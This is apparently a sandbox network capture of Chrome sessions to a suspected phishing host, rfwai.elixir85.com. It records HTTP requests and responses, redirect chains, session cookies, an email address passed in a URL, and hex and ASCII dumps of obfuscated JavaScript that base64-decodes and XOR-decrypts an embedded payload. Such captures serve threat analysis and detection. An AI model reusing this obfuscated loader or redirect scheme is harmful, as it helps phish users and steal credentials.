                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://rfwai.elixir85.com/RfWAi/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InBaRm5LZmdUOUtQbEl2Q2xaVUdHaXc9PSIsInZhbHVlIjoiMDZXaWZ2NSt3bUM5aVUvbWdxVzE3SG0xRjFTMVRNcy9NVWkrbFhBV1V4ZmRrU3NWYzlnM2U4UHUzQkJYYnNzOTZib1pTN0ZtSUtvTk5MVWJ2OUFmdHJnUFRqcFpQaVF4MTd1aEVHM1g3ZDBoZS81ckhQTzlpMW8wcTIzNVV3SGEiLCJtYWMiOiI1ODA1YzM0Yjg4MTc3NzU5ODUzMThlYjIwODU0OWIzZDkzMzM4N2M1YWVmMDg3Yjc4MWY0Y2M1MjU0ZjkwY2QzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlBWTTJjeWNzL1FHYzVsU00zZjBvZHc9PSIsInZhbHVlIjoiQ3RWY3J2bno2a0szcFpEcDlQYWpBalBwS0pybzBTMXVzU1FJOURnemJleldLb2R5aWZIZHVGZGZJWW92NE4vK2c0QSszNDVuZFc2Y0gyMTBkSHZWSlVLSTIzMS8xZ1EwSXdScTFSYlJEU3k4MkVzRFczUEo3bU5YOEFGTCs0VHUiLCJtYWMiOiJmMDQ5YjM3NzY0YzhmZmE3NzhhYzEwM2QxYmRiMzM0NWFlMmI2ZDZiNGY2YjA5NmQzZGEzYjUwNThiZjc1NjJjIiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:17 UTC1015INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: no-cache, private
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7rEYMEupE8IFeJFy%2BP5XQ0dgJWDdqjIS7CLnRDnypVMJrohba%2F2sRCL8Cd%2BJI7ogRS%2BIBz3Fl%2BMkZNCNdkCs5IXJi9PxYtdcY2O%2FX%2FBTpjjq2H6RV%2BR05K9amGN9ew%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Set-Cookie: XSRF-TOKEN=eyJpdiI6IlhSUzFHOUw0NmtSOEg2Snlpb1VnMlE9PSIsInZhbHVlIjoiamxmaDRydjdNRDc1Zm41b2ptUUh4QVlFZDh5U2x4NjJydE1oL1gzM1Via3BldHJqcGFiZ3BFOTdFTTM2ZmlLZ2JIWUdDV1dBMVY2OExPZ0tJQkg1V1dlL29JczlsR2RjWm9qdndhZlREYUh6SmduZGt4Z2JWVDhtR2s4WmpiaFEiLCJtYWMiOiJjNzg3MTllNTZlZTQ4Mzg4MGJlZGU4NjUyZTMwMjAzNmM0YjRjMWI1MGMwYjk4OWRlNjYyZWZmM2Q2ZjA3NzY4IiwidGFnIjoiIn0%3D; expires=Wed, 03-Jul-2024 21:07:17 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                        2024-07-03 19:07:17 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 6c 53 54 6c 55 35 5a 55 74 61 56 30 4a 50 4d 44 46 68 61 6e 4e 4b 4e 56 6c 6e 57 55 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 56 54 64 4f 4d 6d 56 4c 64 6c 56 73 4d 7a 4a 59 4d 31 4a 4b 4d 45 74 4b 61 57 6c 58 54 48 46 5a 4e 56 64 73 54 6d 39 36 63 31 5a 69 4d 6b 39 32 4d 32 35 51 52 53 39 6e 53 30 34 35 62 6d 52 54 65 54 5a 45 4f 48 46 42 61 45 35 73 5a 54 52 44 62 45 68 56 56 55 70 33 4f 54 56 71 4c 33 46 31 65 48 56 70 5a 48 56 75 63 31 70 7a 65 56 56 50 5a 53 74 53 63 31 64 35 4c 32 4a 34 62 6c 59 7a 57 6d 78 45 4c 79 74 61 52 30 68 59 4d 57 4e 34 57 6d 4a 68 61 47 5a 4b 5a 45 35 70 56 30 78 42 54 31 6c 4e 57 6a 42 58 53 57 67
                                                        Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjlSTlU5ZUtaV0JPMDFhanNKNVlnWUE9PSIsInZhbHVlIjoiVTdOMmVLdlVsMzJYM1JKMEtKaWlXTHFZNVdsTm96c1ZiMk92M25QRS9nS045bmRTeTZEOHFBaE5sZTRDbEhVVUp3OTVqL3F1eHVpZHVuc1pzeVVPZStSc1d5L2J4blYzWmxELytaR0hYMWN4WmJhaGZKZE5pV0xBT1lNWjBXSWg
                                                        2024-07-03 19:07:17 UTC1369INData Raw: 37 31 34 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 5a 72 41 6d 77 76 76 42 6f 52 28 50 47 47 6d 67 41 48 56 6f 55 2c 20 66 4a 58 44 44 73 47 77 74 76 29 20 7b 0d 0a 6c 65 74 20 50 57 53 4c 69 59 79 45 61 5a 20 3d 20 27 27 3b 0d 0a 50 47 47 6d 67 41 48 56 6f 55 20 3d 20 61 74 6f 62 28 50 47 47 6d 67 41 48 56 6f 55 29 3b 0d 0a 6c 65 74 20 50 6d 50 51 4e 42 62 74 76 4b 20 3d 20 66 4a 58 44 44 73 47 77 74 76 2e 6c 65 6e 67 74 68 3b 0d 0a 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 50 47 47 6d 67 41 48 56 6f 55 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0d 0a 20 20 20 20 50 57 53 4c 69 59 79 45 61 5a 20 2b 3d 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 50 47 47 6d 67 41 48 56 6f 55 2e 63 68 61 72 43 6f
                                                        Data Ascii: 714<script>function ZrAmwvvBoR(PGGmgAHVoU, fJXDDsGwtv) {let PWSLiYyEaZ = '';PGGmgAHVoU = atob(PGGmgAHVoU);let PmPQNBbtvK = fJXDDsGwtv.length;for (let i = 0; i < PGGmgAHVoU.length; i++) { PWSLiYyEaZ += String.fromCharCode(PGGmgAHVoU.charCo
                                                        2024-07-03 19:07:17 UTC450INData Raw: 46 77 6f 54 48 77 56 69 48 46 4a 44 4c 54 42 75 62 45 49 57 45 41 59 64 47 68 4e 7a 42 68 67 4c 59 44 59 77 48 6d 31 2b 64 58 39 74 52 78 42 6e 4c 52 31 73 4c 33 55 38 41 6b 63 58 66 46 77 4b 61 6a 56 71 61 6a 35 44 59 6d 56 52 54 30 74 75 41 79 67 32 42 69 45 52 57 47 67 48 45 32 4e 4c 53 55 70 74 62 46 46 61 55 57 59 32 43 7a 55 64 43 67 4d 67 5a 30 49 50 65 48 74 2b 53 69 4d 35 48 56 38 65 4e 56 56 4d 59 30 70 74 62 41 5a 61 57 53 6f 33 4d 57 30 47 49 69 38 51 52 31 34 68 4e 6d 67 72 47 43 67 71 55 51 34 58 4f 54 45 6f 4a 77 55 36 59 68 31 63 56 43 38 73 4c 79 77 45 59 7a 77 51 52 31 38 67 4f 53 73 6d 55 55 42 47 55 52 4d 58 62 69 56 4c 53 55 70 74 62 46 46 61 55 57 59 32 43 7a 55 64 43 67 4d 67 5a 30 49 50 65 47 64 2b 56 32 30 69 42 46 39 62 5a 79 4e
                                                        Data Ascii: FwoTHwViHFJDLTBubEIWEAYdGhNzBhgLYDYwHm1+dX9tRxBnLR1sL3U8AkcXfFwKajVqaj5DYmVRT0tuAyg2BiERWGgHE2NLSUptbFFaUWY2CzUdCgMgZ0IPeHt+SiM5HV8eNVVMY0ptbAZaWSo3MW0GIi8QR14hNmgrGCgqUQ4XOTEoJwU6Yh1cVC8sLywEYzwQR18gOSsmUUBGURMXbiVLSUptbFFaUWY2CzUdCgMgZ0IPeGd+V20iBF9bZyN
                                                        2024-07-03 19:07:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        47192.168.2.549778104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:16 UTC1106OUTGET /veVvvrbtHetJlBWJqFj8ZEAe7Nkuts2OfI7xSK2rw HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InBaRm5LZmdUOUtQbEl2Q2xaVUdHaXc9PSIsInZhbHVlIjoiMDZXaWZ2NSt3bUM5aVUvbWdxVzE3SG0xRjFTMVRNcy9NVWkrbFhBV1V4ZmRrU3NWYzlnM2U4UHUzQkJYYnNzOTZib1pTN0ZtSUtvTk5MVWJ2OUFmdHJnUFRqcFpQaVF4MTd1aEVHM1g3ZDBoZS81ckhQTzlpMW8wcTIzNVV3SGEiLCJtYWMiOiI1ODA1YzM0Yjg4MTc3NzU5ODUzMThlYjIwODU0OWIzZDkzMzM4N2M1YWVmMDg3Yjc4MWY0Y2M1MjU0ZjkwY2QzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlBWTTJjeWNzL1FHYzVsU00zZjBvZHc9PSIsInZhbHVlIjoiQ3RWY3J2bno2a0szcFpEcDlQYWpBalBwS0pybzBTMXVzU1FJOURnemJleldLb2R5aWZIZHVGZGZJWW92NE4vK2c0QSszNDVuZFc2Y0gyMTBkSHZWSlVLSTIzMS8xZ1EwSXdScTFSYlJEU3k4MkVzRFczUEo3bU5YOEFGTCs0VHUiLCJtYWMiOiJmMDQ5YjM3NzY0YzhmZmE3NzhhYzEwM2QxYmRiMzM0NWFlMmI2ZDZiNGY2YjA5NmQzZGEzYjUwNThiZjc1NjJjIiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:17 UTC577INHTTP/1.1 404 Not Found
                                                        Date: Wed, 03 Jul 2024 19:07:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EWmHgFM%2FadqMbdMRJF5E01thRBkArEv%2BWqKGsGQUOQoepA5pgD4pXaaFqd15SCRFoQor2uItdtvKyH7heUKe1a2c8RgqR7VwKqAmyiZam5mOInpxEsbJWEBbwKayuA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d928543ff042c0-EWR
                                                        2024-07-03 19:07:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        48192.168.2.549777104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:17 UTC1455OUTGET /RfWAi/?vXalysa.a@centurybizsolutions.com HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://rfwai.elixir85.com/RfWAi/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IlhSUzFHOUw0NmtSOEg2Snlpb1VnMlE9PSIsInZhbHVlIjoiamxmaDRydjdNRDc1Zm41b2ptUUh4QVlFZDh5U2x4NjJydE1oL1gzM1Via3BldHJqcGFiZ3BFOTdFTTM2ZmlLZ2JIWUdDV1dBMVY2OExPZ0tJQkg1V1dlL29JczlsR2RjWm9qdndhZlREYUh6SmduZGt4Z2JWVDhtR2s4WmpiaFEiLCJtYWMiOiJjNzg3MTllNTZlZTQ4Mzg4MGJlZGU4NjUyZTMwMjAzNmM0YjRjMWI1MGMwYjk4OWRlNjYyZWZmM2Q2ZjA3NzY4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjlSTlU5ZUtaV0JPMDFhanNKNVlnWUE9PSIsInZhbHVlIjoiVTdOMmVLdlVsMzJYM1JKMEtKaWlXTHFZNVdsTm96c1ZiMk92M25QRS9nS045bmRTeTZEOHFBaE5sZTRDbEhVVUp3OTVqL3F1eHVpZHVuc1pzeVVPZStSc1d5L2J4blYzWmxELytaR0hYMWN4WmJhaGZKZE5pV0xBT1lNWjBXSWgiLCJtYWMiOiJjMDJhMTQzMmE1OTE3M2UzYzc2ZjJhNGJiMDQ2MzEwOGQzMDlhMDJmYjc1OTczYTI2Yzk3ODM4MDZlMjdjYzFjIiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:18 UTC1125INHTTP/1.1 302 Found
                                                        Date: Wed, 03 Jul 2024 19:07:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: no-cache, private
                                                        Location: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cYpETVhZUznDEBWODLFciT4FOfnhjzglqzVMpNtLBGIRIY7iNv0LD8Ww4W4meQuH%2B3lQIL6542Nkta2prSFhZCW7mDE9HO2d1GxprWcbUiga4G1QFCI2BPAKZxevrA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Set-Cookie: XSRF-TOKEN=eyJpdiI6Ilp2YjY4OFZKWDUvWlYrdGRJaUtYMXc9PSIsInZhbHVlIjoiYjVlUVBrRmdzekNRcGFJTlFzWlc1VXRsay94b2xHRlZmWnRaa1VOT0U1c1poS0NobEFpZ1o0bGlET2JYaFI3bHVBMlJFbFlTeG54bjRKNHJTQysvQW5wMGVzQS91cGJ5RlMzOU9RSUFSSkRpOGhISW9SWXYxUXE4T3RabDEvM3giLCJtYWMiOiIwZTNhNDM4NzZkNjUzZjU2NWUwNmFiOGY3MTM1YmFlNWMyOTllMDg1NWM0YTVhOGNhNDk5YWU3ODlmNzBkMWVjIiwidGFnIjoiIn0%3D; expires=Wed, 03-Jul-2024 21:07:17 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                        2024-07-03 19:07:18 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 46 68 59 56 5a 58 61 6b 38 72 55 56 52 36 5a 6a 49 7a 55 7a 55 76 64 7a 4e 74 54 33 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 56 31 4e 32 53 46 46 49 62 31 52 4f 64 33 42 51 4f 56 5a 73 65 48 4e 69 52 33 64 6e 64 47 78 44 55 58 5a 70 4f 57 31 58 4f 56 68 55 4e 47 52 30 62 58 6c 56 56 44 56 46 5a 55 5a 47 4b 7a 52 35 4d 6c 6c 6d 53 32 78 6d 61 56 4e 59 59 54 4a 56 64 53 38 7a 5a 48 67 33 4d 45 70 4a 55 55 49 78 55 31 52 78 59 57 31 79 5a 6d 39 73 55 6b 73 34 4d 56 6b 30 65 44 45 32 63 55 64 50 4e 57 35 51 65 6d 56 6e 53 33 6c 6f 63 6c 56 4f 56 56 6c 72 63 58 68 32 5a 47 39 78 4f 55 6b 32 55 31 68 59 51 55 73 32 56 48 56 34 62 6a 41
                                                        Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlFhYVZXak8rUVR6ZjIzUzUvdzNtT3c9PSIsInZhbHVlIjoiV1N2SFFIb1ROd3BQOVZseHNiR3dndGxDUXZpOW1XOVhUNGR0bXlVVDVFZUZGKzR5MllmS2xmaVNYYTJVdS8zZHg3MEpJUUIxU1RxYW1yZm9sUks4MVk0eDE2cUdPNW5QemVnS3loclVOVVlrcXh2ZG9xOUk2U1hYQUs2VHV4bjA
                                                        2024-07-03 19:07:18 UTC689INData Raw: 32 61 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 72 66 77 61 69 2e 65 6c 69 78 69 72 38 35 2e 63 6f 6d 2f 31 38 38 33 36 30 38 35 39 30 35 31 32 34 37 39 38 34 32 30 39 49 53 45 4d 41 45 58 4f 55 52 4f 49 55 50 47 57 48 58 3f 39 33 37 37 37 37 30 30 31 34 38 36 30 34 39 39 31 37 39 33 37 35 7a 67 63 69 71 6d 72 6f 79 6e 6e 6b 78 65 77 6a 6b 6c 69 77 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52
                                                        Data Ascii: 2aa<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw'" /> <title>R
                                                        2024-07-03 19:07:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        49192.168.2.549779104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:18 UTC1497OUTGET /188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Referer: https://rfwai.elixir85.com/RfWAi/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6Ilp2YjY4OFZKWDUvWlYrdGRJaUtYMXc9PSIsInZhbHVlIjoiYjVlUVBrRmdzekNRcGFJTlFzWlc1VXRsay94b2xHRlZmWnRaa1VOT0U1c1poS0NobEFpZ1o0bGlET2JYaFI3bHVBMlJFbFlTeG54bjRKNHJTQysvQW5wMGVzQS91cGJ5RlMzOU9RSUFSSkRpOGhISW9SWXYxUXE4T3RabDEvM3giLCJtYWMiOiIwZTNhNDM4NzZkNjUzZjU2NWUwNmFiOGY3MTM1YmFlNWMyOTllMDg1NWM0YTVhOGNhNDk5YWU3ODlmNzBkMWVjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFhYVZXak8rUVR6ZjIzUzUvdzNtT3c9PSIsInZhbHVlIjoiV1N2SFFIb1ROd3BQOVZseHNiR3dndGxDUXZpOW1XOVhUNGR0bXlVVDVFZUZGKzR5MllmS2xmaVNYYTJVdS8zZHg3MEpJUUIxU1RxYW1yZm9sUks4MVk0eDE2cUdPNW5QemVnS3loclVOVVlrcXh2ZG9xOUk2U1hYQUs2VHV4bjAiLCJtYWMiOiIzNzNlZmJmOTY1ZjFlYTE1MzRlZWFmNDQ1MzYzOWM3MTQwODU2MTMwNDM3OGE1ZDJmMjgyMTg5MmZkYzc1NjVkIiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:19 UTC1011INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: no-cache, private
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FSxALRfXhdG8N%2BGMPCWaj12FM3beEf7s9%2BpMsrUOwoHjLwHi%2B0V%2FMQAlZoQUrBJukgBc3Vi4IIE0aG5sATo36z9Qd3tJqZjtP81DIXt%2B78P9yTzF8cNB4125AIM34Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Set-Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; expires=Wed, 03-Jul-2024 21:07:18 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                        2024-07-03 19:07:19 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 30 34 63 6b 35 51 52 30 38 78 55 6d 56 43 53 45 56 79 4f 45 64 56 4e 6e 49 32 55 33 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 61 47 5a 42 51 57 35 34 4e 6e 52 55 4e 58 64 6a 63 55 68 6a 4d 31 42 54 64 53 74 53 62 55 30 79 56 55 52 42 61 30 4e 45 61 55 4e 32 64 79 74 75 63 57 45 31 53 46 68 4e 52 47 73 77 61 55 68 43 52 47 39 32 62 45 70 52 53 7a 56 30 51 33 63 77 4e 7a 5a 79 52 6d 68 76 65 46 4e 31 64 30 35 35 53 47 31 4b 4e 55 6f 30 4b 30 4a 44 64 6a 4e 42 4e 56 5a 7a 55 48 68 44 4d 6e 42 45 51 56 42 73 54 6d 73 31 4e 56 68 6a 61 56 64 42 5a 47 6c 52 59 56 63 7a 63 32 68 4f 53 48 70 55 54 6b 6c 6f 55 6e 42 77 61 53 38 7a 59 6b 55
                                                        Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkU
                                                        2024-07-03 19:07:19 UTC1369INData Raw: 31 32 30 33 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 47 48 68 79 66 43 50 74 46 66 28 77 46 6b 53 78 58 66 75 51 4a 2c 20 54 44 65 46 50 45 47 54 63 51 29 20 7b 0d 0a 6c 65 74 20 43 4f 4b 4a 4b 58 67 42 4d 4d 20 3d 20 27 27 3b 0d 0a 77 46 6b 53 78 58 66 75 51 4a 20 3d 20 61 74 6f 62 28 77 46 6b 53 78 58 66 75 51 4a 29 3b 0d 0a 6c 65 74 20 4f 45 74 51 66 6f 48 76 70 77 20 3d 20 54 44 65 46 50 45 47 54 63 51 2e 6c 65 6e 67 74 68 3b 0d 0a 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 77 46 6b 53 78 58 66 75 51 4a 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0d 0a 20 20 20 20 43 4f 4b 4a 4b 58 67 42 4d 4d 20 2b 3d 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 77 46 6b 53 78 58 66 75 51 4a 2e 63 68 61 72 43
                                                        Data Ascii: 1203<script>function GHhyfCPtFf(wFkSxXfuQJ, TDeFPEGTcQ) {let COKJKXgBMM = '';wFkSxXfuQJ = atob(wFkSxXfuQJ);let OEtQfoHvpw = TDeFPEGTcQ.length;for (let i = 0; i < wFkSxXfuQJ.length; i++) { COKJKXgBMM += String.fromCharCode(wFkSxXfuQJ.charC
                                                        2024-07-03 19:07:19 UTC1369INData Raw: 6e 57 77 59 2f 5a 33 46 42 46 69 59 78 66 42 59 4f 4a 43 73 6c 47 68 67 35 4d 69 63 57 53 43 67 33 50 6b 59 63 4f 53 59 6f 55 77 45 6c 65 48 4e 55 41 54 6b 36 4f 46 6b 48 50 6a 5a 7a 43 32 4a 63 64 47 45 55 53 48 63 70 4f 46 73 45 64 69 59 6b 57 46 56 70 4e 53 4e 51 41 7a 6b 31 4a 52 5a 49 49 7a 63 30 55 31 4a 30 62 58 46 65 42 79 38 41 47 51 63 39 50 79 5a 33 41 7a 6b 63 63 52 35 41 50 79 55 67 64 41 56 4b 61 79 51 69 43 45 30 77 4f 79 39 41 53 6d 73 78 4b 45 55 4b 61 33 59 6e 57 77 59 2f 61 69 5a 61 43 54 42 6d 59 78 51 4c 4f 53 6f 69 52 67 41 6b 50 53 5a 64 42 6e 5a 6e 4d 46 73 41 4f 43 30 73 57 78 30 34 5a 32 38 34 5a 58 5a 30 59 52 52 55 4a 79 77 2f 58 6b 38 6b 4d 53 30 4a 53 6a 73 33 4e 46 6b 41 4e 7a 42 6a 46 41 41 35 49 44 63 49 54 57 4a 68 43 32
                                                        Data Ascii: nWwY/Z3FBFiYxfBYOJCslGhg5MicWSCg3PkYcOSYoUwEleHNUATk6OFkHPjZzC2JcdGEUSHcpOFsEdiYkWFVpNSNQAzk1JRZIIzc0U1J0bXFeBy8AGQc9PyZ3AzkccR5APyUgdAVKayQiCE0wOy9ASmsxKEUKa3YnWwY/aiZaCTBmYxQLOSoiRgAkPSZdBnZnMFsAOC0sWx04Z284ZXZ0YRRUJyw/Xk8kMS0JSjs3NFkANzBjFAA5IDcITWJhC2
